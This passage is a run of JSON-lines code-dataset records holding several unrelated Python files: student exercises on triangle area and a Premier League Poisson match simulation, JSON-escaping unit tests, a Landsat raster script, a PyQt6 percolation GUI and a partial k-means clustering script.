%.1f\"%resultado,\".\")\n\telse:\n\t\tresultado = ((a+b)*c)/2\n\t\tprint(\"Área: %.1f\"%resultado,\".\")\n\n\n\ndef main():\n\tlado_a = int(input(\"Digite um Valor para o Lado A do Triângulo: \"))\n\tlado_b = int(input(\"Digite um Valor para o Lado B do Triângulo: \"))\n\tlado_c = int(input(\"Digite um Valor para o Lado C do Triângulo: \"))\n\tvalida_triangulo(lado_a, lado_b, lado_c)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"rogeriosilva-ifpi/adsi-algoritmos-2016.1","sub_path":"atividade_d/Osmar_Junior_ADS2016_1/atdq8.py","file_name":"atdq8.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"141696316","text":"# Question 1 - Predicting the winner\n\n# Firstly we need to import some modules to help us along the way.\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom collections import Counter\n\n\ndata = pd.read_csv(\"resources/PremierLeague1718.csv\") # Read the data set file\n\n\n# The data file consists of empty columns and rows which we want to clean up so that we are working with _clean_ data.\n# To do this we can use the below function.\ndef clean(dataframe):\n assert isinstance(dataframe, pd.DataFrame), 'Argument of wrong type!'\n return dataframe.dropna(axis=1, how='all')\n\n\ndata = 
clean(data) # Clean the data up to remove empty and NaN cols\n\n\n# Because the data file consists of a lot of columns, some of them are irrelevant to us,\n# the below function can help eliminate these columns, to do this we can specify only the columns we want to keep as a list of column names.\ndef filterCols(dataframe, cols):\n assert isinstance(dataframe, pd.DataFrame), 'Argument of wrong type!'\n assert isinstance(cols, list), 'Argument of wrong type!'\n return dataframe[cols]\n\n\n# We can then use this function to filter our data.\ncolsToKeep = [\"Date\", \"HomeTeam\", \"AwayTeam\", \"FTHG\", \"FTAG\", \"HS\", \"AS\", \"HST\", \"AST\", \"FTR\"] # List of cols we want to keep\ndata = filterCols(data, colsToKeep) # Filter relevant cols\n\n\n# To get an idea of how the data looks like, we can use the `describe` function to give us various information.\n# (This is helpful to answer Question 1, part 1.)\nprint(\"Description:\")\nprint(data.describe())\n\n\n# This function will allow us to rename an existing column in a dataframe.\ndef renameCols(df, colsdict):\n assert isinstance(df, pd.core.series.Series), 'Argument of wrong type!'\n assert isinstance(colsdict, dict), 'Argument of wrong type!'\n assert len([x for x in colsdict.keys() if x in df]) != len(colsdict), \"One or more columns you want to rename do not exist in the dataframe\"\n return df.reset_index().rename(columns=colsdict)\n\n\n# Furthermore, we can also group the data in a way so that we can see an outlook of how many goals were scored\n# and conceded by each team over the whole league.\ndef creategroups():\n groups = [0,0,0,0]\n groups[0] = renameCols(data.groupby(\"HomeTeam\")[\"FTR\"].apply(lambda x: x[x == 'H'].count()), {\"HomeTeam\": \"Team\", \"FTR\": \"Wins at home\"})\n groups[1] = renameCols(data.groupby(\"AwayTeam\")[\"FTR\"].apply(lambda x: x[x == 'A'].count()), {\"AwayTeam\": \"Team\", \"FTR\": \"Wins away\"})\n groups[2] = renameCols(data.groupby(\"HomeTeam\")[\"FTR\"].apply(lambda x: x[x == 'A'].count()), {\"HomeTeam\": \"Team\", \"FTR\": \"Losses at home\"})\n groups[3] = renameCols(data.groupby(\"AwayTeam\")[\"FTR\"].apply(lambda x: x[x == 'H'].count()), {\"AwayTeam\": \"Team\", \"FTR\": \"Losses away\"})\n return groups\n\n# Then we can merge these groups to present the data well.\ngroups = creategroups()\nmerged = groups[0].merge(groups[1], on=\"Team\").merge(groups[2], on=\"Team\").merge(groups[3], on=\"Team\")\n\n# After this we can see an outlook on wins and losses for all teams and analyse the data which is also helpful for Q1.1.\nprint(\"Data on wins/losses\")\nprint(merged)\n\n# We can also see the results on averages from the describe page\nprint(\"Averages of the wins/losses\")\nprint(merged.describe())\n\n\n# We can create a data structure containing information about the teams we care about. 
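# [Illustrative sketch] creategroups() below counts outcomes with
# x[x == 'H'].count(); an equivalent, more idiomatic boolean sum
# (column names are the dataset's, the helper name is illustrative):
def wins_at_home(df):
    return (df.groupby("HomeTeam")["FTR"]
              .apply(lambda s: (s == "H").sum())   # True values count as 1
              .rename("Wins at home")
              .reset_index())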
In this instance Manchester United and Manchester City.\n# This can help us answer Question 1 part 2.\nrteams = [\"Man United\", \"Man City\"] # Teams we care about\n\n# Creating a dictionary to store data for the relevant teams\nteams = {\"ManUnitedHome\": \"\", \"ManCityHome\": \"\", \"ManUnitedAway\": \"\", \"ManCityAway\": \"\"} # A dict to contain relevant team dataframes\n\n# Populate the data into the respective teams\nteams[\"ManUnitedHome\"] = data.loc[data[\"HomeTeam\"] == \"Man United\"]\nteams[\"ManUnitedAway\"] = data.loc[data[\"AwayTeam\"] == \"Man United\"]\nteams[\"ManCityHome\"] = data.loc[data[\"HomeTeam\"] == \"Man City\"]\nteams[\"ManCityAway\"] = data.loc[data[\"AwayTeam\"] == \"Man City\"]\n\n# Printing data for each team playing both home and away respectively.\nprint(\"Man United Home:\")\nprint(teams[\"ManUnitedHome\"].describe())\nprint(\"\\nMan City Home\")\nprint(teams[\"ManCityHome\"].describe())\nprint(\"-------------\")\nprint(\"Man United Away:\")\nprint(teams[\"ManUnitedAway\"].describe())\nprint(\"\\nMan City Away\")\nprint(teams[\"ManCityAway\"].describe())\n\n\n# To get a better visualisation of how these teams stack up against eachother we can plot these values onto a graph to\n# compare Manchester United's home defence against Manchester City's away offence and Manchester City's home defence\n# against Manchester United's away offence.\ndef plotstats(stat):\n assert isinstance(stat, list), 'Argument of wrong type!'\n fig = plt.figure(1)\n fig.set_size_inches(12, 8)\n for i in stat:\n plt.subplot(i.plots[0])\n i.df.boxplot(i.col, vert=False)\n plt.subplot(i.plots[1])\n temp = i.df[i.col].as_matrix()\n plt.hist(temp, bins=20, alpha=1, label=i.glabel)\n plt.xlabel(i.xlabel)\n plt.ylabel(i.ylabel)\n plt.legend()\n plt.xticks(np.arange(min(temp), max(temp)+1, 1.0))\n plt.yticks(np.arange(0, len(temp)+1, 1.0))\n plt.show()\n\n\n# We can create a simple object to use with the above function because it gives us a dynamic way of displaying information for different teams.\n# This is useful in plotting for multiple graphs in one go.\nclass PlotObject:\n def __init__(self, df, col, glabel, xlabel, ylabel, plots):\n self.df = df\n self.col = col\n self.glabel = glabel\n self.xlabel = xlabel\n self.ylabel = ylabel\n self.plots = plots\n\n\n# We can then plot these teams and see how the data looks like. 
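# Compatibility note for plotstats() above: Series.as_matrix() was
# deprecated in pandas 0.23 and removed in 1.0; on modern pandas that
# line would read:
#     temp = i.df[i.col].to_numpy()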
This will help answer Question 1 part 3.\n# Manchester United's home defence vs Manchester City's away offence\nobj = []\nobj.append(PlotObject(teams[\"ManUnitedHome\"], \"FTAG\", \"Man Utd Home\", \"Number of goals conceded\", \"Number of Matches\", [221,223]))\nobj.append(PlotObject(teams[\"ManCityAway\"], \"FTAG\", \"Man City Away\", \"Number of goals scored\", \"Number of Matches\", [222,224]))\nplotstats(obj)\n\n\n# Manchester City's home defence vs Manchester United's away offence\nobj = []\nobj.append(PlotObject(teams[\"ManCityHome\"], \"FTAG\", \"Man City Home\", \"Number of goals conceded\", \"Number of Matches\", [221, 223]))\nobj.append(PlotObject(teams[\"ManUnitedAway\"], \"FTAG\", \"Man Utd Away\", \"Number of goals scored\", \"Number of Matches\", [222, 224]))\nplotstats(obj)\n\n\n# ## Simulation\n# To simulate the future matches, we can use the poisson distribution to randomly generate future scores and see\n# how the teams stack up against eachother.\ndef sim_poisson(nums, mean):\n gen = np.random.poisson(lam = mean, size = nums)\n return gen\n\n\n# And then we can use this function to generate some scores for the following cases:\n# Man Utd Home vs Man City Away\n# Man City Home vs Man Utd Away\ndef generate_scores():\n gen_scores = []\n gen_scores.append(sim_poisson(1000, teams[\"ManUnitedHome\"][\"FTHG\"].mean()))\n gen_scores.append(sim_poisson(1000, teams[\"ManUnitedAway\"][\"FTAG\"].mean()))\n gen_scores.append(sim_poisson(1000, teams[\"ManCityHome\"][\"FTHG\"].mean()))\n gen_scores.append(sim_poisson(1000, teams[\"ManCityAway\"][\"FTAG\"].mean()))\n\n MUHVSMCA = list(map(list,zip(gen_scores[0],gen_scores[3])))\n MCHVSMUA = list(map(list,zip(gen_scores[2],gen_scores[1])))\n \n return {\"ManUtdHvsMC\": MUHVSMCA, \"ManCityHvsMU\": MCHVSMUA}\n\n# Then we generate these scores to get a dictionary of paired data.\ngenscores = generate_scores()\n\n\n# We can summarise this data by looking at who won each game.\n\n# Helper function to check for the winner given a result which would always be in the format (x,y) as per genscores.\ndef getresult(arr):\n if arr[0] > arr[1]:\n return \"H\"\n elif arr[0] < arr[1]:\n return \"A\"\n else:\n return \"D\"\n\n# Get a summary of wins\nManUtdHvsMC = [getresult(i) for i in (genscores[\"ManUtdHvsMC\"])]\nManCityHvsMU = [getresult(i) for i in (genscores[\"ManCityHvsMU\"])]\n\n# Split the simulated results into home and away stats.\nhome_stats = {\n \"MU Win\": Counter(ManUtdHvsMC)[\"H\"],\n \"MC Win\": Counter(ManCityHvsMU)[\"H\"],\n}\n\naway_stats = {\n \"MU Win\": Counter(ManCityHvsMU)[\"A\"],\n \"MC Win\": Counter(ManUtdHvsMC)[\"A\"],\n}\n\n# Handling draws appropriately as they will just be considered as one group regardless of what side they were playing on.\ndraws = Counter(ManCityHvsMU)[\"D\"] + Counter(ManUtdHvsMC)[\"D\"]\n\n# Get a summary of the data that has been modelled.\ndf = pd.DataFrame(home_stats, index=[\"Home\"])\ndf = df.append(pd.DataFrame(away_stats, index=[\"Away\"]))\nprint(\"Total number of simulations: \",len(ManUtdHvsMC)+len(ManCityHvsMU))\nprint(\"\\nWins/Losses simulated: \\n\",df)\nprint(\"\\nTotal draws in simulation: \",Counter(ManUtdHvsMC)[\"D\"] + Counter(ManCityHvsMU)[\"D\"])\n\n# Here we will be able to find probabilities of each team home and away and see who has a higher chance of winning on a certain side.\ndef findoverallprob(team):\n assert isinstance(team, str), 'Argument of wrong type!'\n\n total_matches = len(ManUtdHvsMC) + len(ManCityHvsMU)\n if team == \"MU\":\n team_win = home_stats[\"MU 
Win\"] + away_stats[\"MU Win\"]\n elif team == \"MC\":\n team_win = home_stats[\"MC Win\"] + away_stats[\"MC Win\"]\n elif team == \"D\":\n team_win = draws\n else:\n raise ValueError('Team must be either MU or MC.')\n return team_win/float(total_matches)\n\n\n# From this we can observe the following results:\n\n\nprint(\"Probablity of Manchester United winning: \", findoverallprob(\"MU\"))\nprint(\"Probablity of Manchester City winning: \", findoverallprob(\"MC\"))\nprint(\"Probability of drawing: \", findoverallprob(\"D\"))\n\n\n\n\ndef findprob(team, side):\n if side == \"home\":\n if team == \"MU\":\n total_matches = home_stats[\"MU Win\"] + away_stats[\"MC Win\"]\n return home_stats[\"MU Win\"]/float(total_matches)\n elif team == \"MC\":\n total_matches = home_stats[\"MC Win\"] + away_stats[\"MU Win\"]\n return home_stats[\"MC Win\"]/float(total_matches)\n elif side == \"away\":\n if team == \"MU\":\n total_matches = away_stats[\"MU Win\"] + home_stats[\"MC Win\"]\n return away_stats[\"MU Win\"]/float(total_matches)\n elif team == \"MC\":\n total_matches = away_stats[\"MC Win\"] + home_stats[\"MU Win\"]\n return away_stats[\"MC Win\"]/float(total_matches)\n else:\n raise ValueError('Side must be home or away')\n\n raise ValueError('Team must be either MU or MC.')\n\n\n\n# And we can see the following probabilities from this:\nprint(\"Probability of MU win given they play home: \", findprob(\"MU\", \"home\"))\nprint(\"Probability of MC win given they play home: \", findprob(\"MC\", \"home\"))\nprint(\"Probability of MU win given they play away: \", findprob(\"MU\", \"away\"))\nprint(\"Probability of MC win given they play away: \", findprob(\"MC\", \"away\"))\n\n\n# To verify our model we can pick another two teams at random and pair them up against eachother to see if our simulation model is a feasible\n# and reliable choice for predicting football scores. 
We will choose Chelsea and Arsenal for this test.\n\n# Get existing games played by both teams\nchelsea = [data.query(\"HomeTeam == 'Chelsea'\"), data.query(\"AwayTeam == 'Chelsea'\")]\narsenal = [data.query(\"HomeTeam == 'Arsenal'\"), data.query(\"AwayTeam == 'Arsenal'\")]\n\n# Describe the data to see how the teams have performed at home\nprint(chelsea[0].describe())\nprint(arsenal[0].describe())\n\n# And away\nprint(chelsea[1].describe())\nprint(arsenal[1].describe())\n\n# Get the actual result between the teams to compare with our simulation\nCHAW = data.query(\"AwayTeam == 'Arsenal' & HomeTeam == 'Chelsea'\")\nAHCW = data.query(\"AwayTeam == 'Chelsea' & HomeTeam == 'Arsenal'\")\n\n# Generate random games of Chelsea home and away\ng_CH = sim_poisson(10, chelsea[0][\"FTHG\"].mean())\ng_CA = sim_poisson(10, chelsea[1][\"FTAG\"].mean())\n\n# Generate random games of Arsenal home and away=\ng_AH = sim_poisson(10, arsenal[0][\"FTHG\"].mean())\ng_AA = sim_poisson(10, arsenal[1][\"FTAG\"].mean())\n\n\n# Combine these results as paired data.\nCHAA = zip(g_CH, g_AA)\nAHCA = zip(g_AH, g_CA)\n\n# And print out our findings to see what happened.\nprint(\"Chelsea Home vs Arsenal Away: \\n\")\nprint(\"Actual score: \", CHAW)\nprint(\"Simulated match results (C = chelsea win, A = Arsenal win, D = Draw): \", [\"C\" if getresult(x) == \"H\" else \"A\" if getresult(x) == \"A\" else \"D\" for x in CHAA])\n\nprint(\"\\n-------------------------\\n\")\n\nprint(\"Arsenal Home vs Chelsea Away: \\n\")\nprint(\"Actual score: \", AHCW)\nprint(\"Simulated match results (C = chelsea win, A = Arsenal win, D = Draw): \", [\"C\" if getresult(x) == \"H\" else \"A\" if getresult(x) == \"A\" else \"D\" for x in AHCA])","repo_name":"redrails/CO3093","sub_path":"CW1/CW1_mic7/CW1_mic7/Question_1_mic7.py","file_name":"Question_1_mic7.py","file_ext":"py","file_size_in_byte":12729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42853874250","text":"# -*- coding: utf-8 -*-\n\nfrom hoboken.ext.json_app import HobokenJsonApplication\n\nfrom hoboken.tests.compat import unittest\nfrom mock import patch, MagicMock\n\nfrom hoboken.six import u\n\nclass TestHobokenJsonApplication(unittest.TestCase):\n def setUp(self):\n self.app = HobokenJsonApplication('')\n\n def test_will_set_default_indent_config(self):\n self.assertIn('JSON_INDENT', self.app.config)\n\n def test_will_set_default_escape_config(self):\n self.assertEqual(self.app.config['JSON_ESCAPE'], True)\n\n def test_will_escape_string(self):\n val = b'escape me'.decode('latin-1')\n output = b'escape \\\\u003C/\\\\u003E me'.decode('latin-1')\n self.assertEqual(self.app.escape_string(val), output)\n\n def test_will_escape_unicode_seperators(self):\n # Value is u\"escape \\u2028 me\"\n val = b'escape \\xE2\\x80\\xA8 me'.decode('utf-8')\n output = b'escape \\\\u2028 me'.decode('latin-1')\n\n self.assertEqual(self.app.escape_string(val), output)\n\n # Value is u\"escape \\u2029 me\"\n val = b'escape \\xE2\\x80\\xA9 me'.decode('utf-8')\n output = b'escape \\\\u2029 me'.decode('latin-1')\n\n self.assertEqual(self.app.escape_string(val), output)\n\n def test_will_escape_bytes(self):\n val = b'escape me'\n output = b'escape \\\\u003C/\\\\u003E me'\n self.assertEqual(self.app.escape_string(val), output)\n\n def test_will_not_escape_if_requested(self):\n self.app.config['JSON_ESCAPE'] = False\n request_mock = MagicMock()\n response_mock = MagicMock()\n val = {'foo': 'dont escape me'}\n\n with patch('json.dumps', 
return_value='') as json_mock:\n self.app.on_returned_body(request_mock, response_mock, val)\n\n json_mock.assert_called_with(val, indent=self.app.config['JSON_INDENT'])\n\n def test_will_encapsulate_value(self):\n request_mock = MagicMock()\n response_mock = MagicMock()\n value = 'foobar'\n\n with patch('json.dumps', return_value='') as json_mock:\n self.app.on_returned_body(request_mock, response_mock, value)\n\n json_mock.assert_called_with({'value': value}, indent=self.app.config['JSON_INDENT'])\n\n def test_will_not_encapsulate_if_requested(self):\n self.app.config['JSON_WRAP'] = False\n\n request_mock = MagicMock()\n response_mock = MagicMock()\n value = b'some val'\n\n self.app.on_returned_body(request_mock, response_mock, value)\n self.assertEqual(value, response_mock.body)\n\n def test_will_handle_non_escapable(self):\n val = '{\"no_escape\": 0}'\n output = '{\"no_escape\": 0}'\n self.assertEqual(self.app.escape_string(val), output)\n\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestHobokenJsonApplication))\n\n return suite\n\n","repo_name":"andrew-d/Hoboken","sub_path":"hoboken/tests/test_ext.py","file_name":"test_ext.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"12355716803","text":"# %%\n\"\"\"\nPrepare for loading Landsat images\n\"\"\"\nimport rasterio\nfrom rasterio.io import DatasetReader\nfrom pathlib import Path\nfrom datetime import datetime\n\n\ndef open_landsat_file(\n satellite_number: str = \"L7\",\n level: int = 2,\n path: int = 190,\n start_row: int = 27,\n end_row: int = 27,\n aq_date: datetime = datetime(2007, 9, 14),\n file_type: str = \"B80\",\n) -> DatasetReader:\n # Folder where the Landsat images are located\n root_path = Path(__file__) / \"..\" / \"data1\" / \"LS7\" / \"LS2007\"\n\n # Construct filename from parameters\n filename = \"\".join(\n [\n satellite_number,\n f\"{level:01d}\",\n f\"{path:03d}\",\n f\"{start_row:03d}\",\n \"_\",\n f\"{end_row:03d}\",\n f\"{aq_date.strftime('%Y%m%d')}\",\n \"_\",\n file_type,\n \".TIF\",\n ]\n )\n\n # Open the file with rasterio (only reads header, does not load image data yet)\n return rasterio.open(root_path / filename)\n\n\n# %%\n\"\"\"\nLoad a panchromatic image and show its metadata\n\"\"\"\n\nband_8_pan = open_landsat_file(level=2, file_type=\"B80\")\nband_8_pan.meta\n\n# %%\n\"\"\"\nRead its image data and plot a subset\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nrow0, row1 = 9800, 11500\ncol0, col1 = 6500, 8000\nimage_data = band_8_pan.read(1, window=((row0, row1), (col0, col1)))\n\nplt.imshow(\n band_8_pan.read(1, window=((row0, row1), (col0, col1))),\n cmap=\"gray\",\n)\n\n# %%\n\"\"\"\nLayer stacking: Combine multiple bands into a single .img file\n\"\"\"\n\nband_1_bg = open_landsat_file(level=1, file_type=\"B10\")\nband_2_g = open_landsat_file(level=1, file_type=\"B20\")\nband_3_r = open_landsat_file(level=1, file_type=\"B30\")\nband_4_nir = open_landsat_file(level=1, file_type=\"B40\")\nband_5_mir1 = open_landsat_file(level=1, file_type=\"B50\")\nband_6_mir2 = open_landsat_file(level=2, file_type=\"B70\")\n\nmeta = band_1_bg.meta.copy()\nmeta[\"count\"] = 6\n\n# This will take a while\nwith rasterio.open(\"results/ls2007_ms_notir.img\", \"w\", **meta) as dest:\n dest.write(band_1_bg.read(1), 1)\n dest.write(band_2_g.read(1), 2)\n dest.write(band_3_r.read(1), 3)\n dest.write(band_4_nir.read(1), 4)\n dest.write(band_5_mir1.read(1), 5)\n 
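# [Illustrative sketch] The ((row0, row1), (col0, col1)) tuples used for
# windowed reads above also have a named equivalent in rasterio (the
# offsets below are the panchromatic-subset values from earlier):
from rasterio.windows import Window

window = Window(col_off=6500, row_off=9800, width=1500, height=1700)
subset = band_8_pan.read(1, window=window)   # band_8_pan is opened above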
dest.write(band_6_mir2.read(1), 6)\n\n# %%\n\"\"\"\nCreate a subset\n\"\"\"\n\n# Coordinates for group 2\nx0, y0 = 511920, 5326920\nx1, y1 = x0 + 18000, y0 + 18000\n\n# %%\n\"\"\"\nPlot the subset as panchromatic image\n\"\"\"\n\n# convert coordinates to pixel indices from the panchromatic image (x-axis is flipped!)\nrow0, col0 = band_8_pan.index(x0, y0)\nrow1, col1 = band_8_pan.index(x1, y1)\nwindow = ((row1, row0), (col0, col1))\nplt.imshow(band_8_pan.read(1, window=window), cmap=\"gray\")\n\n# %%\n\"\"\"\nPlot the subset as multispectral image\n\"\"\"\nimport numpy as np\n\n# convert coordinates to pixel indices from the multispectral image (x-axis is flipped!)\nrow0, col0 = band_1_bg.index(x0, y0)\nrow1, col1 = band_1_bg.index(x1, y1)\nwindow = ((row1, row0), (col0, col1))\n\n# create an rgb image from BG, G and R bands\nrgb = np.dstack(\n [\n band_1_bg.read(1, window=window),\n band_2_g.read(1, window=window),\n band_3_r.read(1, window=window),\n ]\n)\n\nplt.imshow(rgb)\n\n\n# %%\n","repo_name":"pothos-dev/study","sub_path":"Fernerkundung/ue3.py","file_name":"ue3.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34834058806","text":"from PyQt6.QtWidgets import QMainWindow, QSpinBox, QWidget, QPushButton, QGridLayout, QSlider, QLabel\nfrom PyQt6.QtCore import Qt\nfrom src.painter import Painter\nfrom src.percolador import percolar\nimport random\n\nclass Window(QMainWindow):\n\t\"\"\"Widget que representa mi ventana principal\"\"\"\n\n\t# Declaración de los widgets\n\t__SBTam=None\n\t__painter=None\n\t__botonGenerarMatriz=None\n\t__SLProbabilidad=None\n\t__botonPercolar=None\n\t__labelPercolacion=None\n\t__labelProbabilidad=None\n\t__labelTamMatriz=None\n\n\t# Declaración de las variables\n\t__title=None\n\t__top=None\n\t__left=None\n\t__width=None\n\t__height=None\n\t__matriz=None\n\t__tam=0\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\t# Inicializacion de variables\n\t\tself.__title=\"Percolación\"\n\t\tself.__top=150\n\t\tself.__left=150\n\t\tself.__width=500\n\t\tself.__height=350\n\n\t\t# Inicializacion de widgets\n\t\tself.__SBTam=QSpinBox()\n\t\tself.__painter=Painter()\n\t\tself.__botonGenerarMatriz=QPushButton()\n\t\tself.__botonPercolar=QPushButton()\n\t\tself.__SLProbabilidad=QSlider()\n\t\tself.__labelPercolacion=QLabel(\"\")\n\t\tself.__labelTamMatriz=QLabel(\"Tamaño de la matriz:\")\n\t\tself.__labelProbabilidad=QLabel(\"Probabilidad:\")\n\n\t\t# Geometria de la ventana principal\n\t\tself.setWindowTitle(self.__title)\n\t\tself.setGeometry(self.__top, self.__left, self.__width, self.__height)\n\n\t\t# declaro e inicializo el widget central y el layout\n\t\twidgetCentral=QWidget(self)\n\t\tlayout=QGridLayout()\n\n\t\t# Configuracion del layout\n\t\tlayout.setAlignment(Qt.AlignmentFlag.AlignHCenter)\n\n\t\t# Configuraciones del SpinBox tamaño matriz\n\t\tself.__SBTam.setGeometry(500-120, 0, 120, 20)\n\t\tself.__SBTam.setMaximum(50)\n\t\tself.__SBTam.setMinimum(10)\n\n\t\t# Configuraciones del slider probabilidad\n\t\tself.__SLProbabilidad.setOrientation(Qt.Orientation.Horizontal)\n\t\tself.__SLProbabilidad.setMaximum(10)\n\t\tself.__SLProbabilidad.setMinimum(1)\n\t\tself.__SLProbabilidad.setPageStep(1)\n\t\tself.__SLProbabilidad.setMinimumSize(120, 20)\n\t\tself.__SLProbabilidad.setMaximumSize(400, 20)\n\t\tself.__SLProbabilidad.setValue(4)\n\n\t\t# Configuraciones del label percolacion\n\t\tself.__labelPercolacion.setMaximumSize(500,20)\n\n\t\t# 
Configuraciones del label tamaño matriz\n\t\tself.__labelTamMatriz.setMaximumSize(150,20)\n\n\t\t# Configuraciones del label probabilidad\n\t\tself.__labelProbabilidad.setMaximumSize(150,20)\n\n\t\t# Configuraciones del painter\n\t\tself.__painter.setGeometry(0, 0, 300, 300)\n\n\t\t# Configuraciones del botonGenerarMatriz\n\t\tself.__botonGenerarMatriz.setGeometry(500-120, 35, 120, 20)\n\t\tself.__botonGenerarMatriz.setText(\"Generar Matriz\")\n\n\t\t# Configuraciones del botonPercolar\n\t\tself.__botonPercolar.setMaximumSize(400, 20)\n\t\tself.__botonPercolar.setMinimumSize(120, 20)\n\t\tself.__botonPercolar.setText(\"Percolar\")\n\t\tself.__botonPercolar.setEnabled(False)\n\n\t\t# Conexiones\n\t\tself.__botonGenerarMatriz.clicked.connect(self._BotonGenerarMatriz)\n\t\tself.__botonPercolar.clicked.connect(self._BotonPercolar)\n\n\t\t# Agrego los widgets al layout\n\t\tlayout.addWidget(self.__painter, 0, 0, 7, 1)\n\t\tlayout.addWidget(self.__labelPercolacion, 8, 0, 1, 1)\n\t\tlayout.addWidget(self.__labelTamMatriz, 0, 1, 1, 1)\n\t\tlayout.addWidget(self.__SBTam, 1, 1, 1, 1)\n\t\tlayout.addWidget(self.__labelProbabilidad, 2, 1, 1, 1)\n\t\tlayout.addWidget(self.__SLProbabilidad, 3, 1, 1, 1)\n\t\tlayout.addWidget(self.__botonGenerarMatriz, 4, 1, 1, 1)\n\t\tlayout.addWidget(self.__botonPercolar, 5, 1, 1, 1)\n\t\tlayout.setColumnStretch(0, 3)\n\t\tlayout.setRowStretch(8, 0)\n\n\t\t# Configuraciones del widget central y del layout\n\t\twidgetCentral.setLayout(layout)\n\t\tself.setCentralWidget(widgetCentral)\n\n\tdef _BotonGenerarMatriz(self):\n\t\tself.__tam=self.__SBTam.value()\n\t\tself.__matriz=[ [ None for y in range(self.__tam) ] for x in range(self.__tam) ]\n\t\tprobabilidad=self.__SLProbabilidad.value()/10\n\n\t\tfor i in range(0,self.__tam):\n\t\t\tfor j in range(0, self.__tam):\n\t\t\t\t#Genera un numero aleatorio entre 0 y 10 que dividido 10 nos da un valor entre 0 y 1\n\t\t\t\tif(random.randrange(0, 10)/10.0 <= probabilidad):\n\t\t\t\t\tself.__matriz[i][j] = 0\n\t\t\t\telse:\n\t\t\t\t\tself.__matriz[i][j] = 1\n\n\t\tself.__painter.setMatriz(self.__matriz)\n\n\t\tself.__labelPercolacion.setText(\"\")\n\n\t\tself.__botonPercolar.setEnabled(True)\n\n\tdef _BotonPercolar(self):\n\n\t\tflag, self.__matriz=percolar(self.__matriz)\n\n\t\tself.__painter.update()\n\n\t\tif(flag):\n\t\t\tself.__labelPercolacion.setStyleSheet(\"color: green; font-weight: bold\")\n\t\t\tself.__labelPercolacion.setText(\"Hay percolación ✓\")\n\t\telse:\n\t\t\tself.__labelPercolacion.setStyleSheet(\"color: red; font-weight: bold\")\n\t\t\tself.__labelPercolacion.setText(\"No hay percolación ❌\")\n\n\t\tself.__botonPercolar.setEnabled(False)","repo_name":"UF-LP2/.github","sub_path":"Interfaz_Grafica_PyQt/PercolacionRecursiva/src/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4958380729","text":"import numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nfrom numpy.linalg import norm\nfrom collections import Counter, defaultdict\nimport matplotlib.pyplot as plt\nfrom scipy.sparse import csr_matrix, find\nfrom sklearn.metrics import calinski_harabaz_score\nfrom scipy.spatial.distance import euclidean\nfrom sklearn.decomposition import TruncatedSVD\nimport click\nimport logging\nfrom pathlib import Path\nfrom dotenv import find_dotenv, load_dotenv\nfrom sklearn.utils import shuffle\n\n\n# reading the file and generating the csr matrix\ndef csr_read(fname, ftype=\"csr\", 
nidx=1):\n \n \n with open(fname) as f:\n lines = f.readlines()\n \n if ftype == \"clu\":\n p = lines[0].split()\n nrows = int(p[0])\n ncols = int(p[1])\n nnz = long(p[2])\n lines = lines[1:]\n assert(len(lines) == nrows)\n elif ftype == \"csr\":\n nrows = len(lines)\n ncols = 0 \n nnz = 0 \n for i in xrange(nrows):\n p = lines[i].split()\n if len(p) % 2 != 0:\n raise ValueError(\"Invalid CSR matrix. Row %d contains %d numbers.\" % (i, len(p)))\n nnz += len(p)/2\n for j in xrange(0, len(p), 2): \n cid = int(p[j]) - nidx\n if cid+1 > ncols:\n ncols = cid+1\n else:\n raise ValueError(\"Invalid sparse matrix ftype '%s'.\" % ftype)\n val = np.zeros(nnz, dtype=np.float)\n ind = np.zeros(nnz, dtype=np.int)\n ptr = np.zeros(nrows+1, dtype=np.long)\n n = 0 \n for i in xrange(nrows):\n p = lines[i].split()\n for j in xrange(0, len(p), 2): \n ind[n] = int(p[j]) - nidx\n val[n] = float(p[j+1])\n n += 1\n ptr[i+1] = n \n \n assert(n == nnz)\n \n return csr_matrix((val, ind, ptr), shape=(nrows, ncols), dtype=np.float)\n\n\n#scales the matrix by frequency of the terms.\ndef csr_idf(mat, copy=False, **kargs):\n \n if copy is True:\n mat = mat.copy()\n nrows = mat.shape[0]\n nnz = mat.nnz\n ind, val, ptr = mat.indices, mat.data, mat.indptr\n # document frequency\n df = defaultdict(int)\n for i in ind:\n df[i] += 1\n # inverse document frequency\n for k,v in df.items():\n df[k] = np.log(nrows / float(v)) ## df turns to idf - reusing memory\n # scale by idf\n for i in range(0, nnz):\n val[i] *= df[ind[i]]\n \n return df if copy is False else mat\n\n \n#normalizing the csr matrix\ndef csr_l2normalize(mat, copy=False, **kargs):\n \n if copy is True:\n mat = mat.copy()\n nrows = mat.shape[0]\n nnz = mat.nnz\n ind, val, ptr = mat.indices, mat.data, mat.indptr\n for i in range(nrows):\n rsum = 0.0 \n for j in range(ptr[i], ptr[i+1]):\n rsum += val[j]**2\n if rsum == 0.0:\n continue # do not normalize empty rows\n rsum = float(1.0/np.sqrt(rsum))\n for j in range(ptr[i], ptr[i+1]):\n val[j] *= rsum\n \n if copy is True:\n return mat\n\n\n\n\n\n# computing the centroids for the clusters\ndef findCentroids(mat, idx, k=2):\n centroids = list()\n for i in range(1,k+1):\n indi = [j for j, x in enumerate(idx) if x == i]\n members = mat[indi,:]\n if (members.shape[0] > 1):\n centroids.append(members.toarray().mean(0))\n \n centroids_csr = csr_matrix(centroids)\n return centroids_csr\n\n\n#finding the appropriate clusters\ndef findCluster(mat, centroids):\n idx = list()\n similarityMatrix = mat.dot(centroids.T)\n\n for i in range(similarityMatrix.shape[0]):\n row = 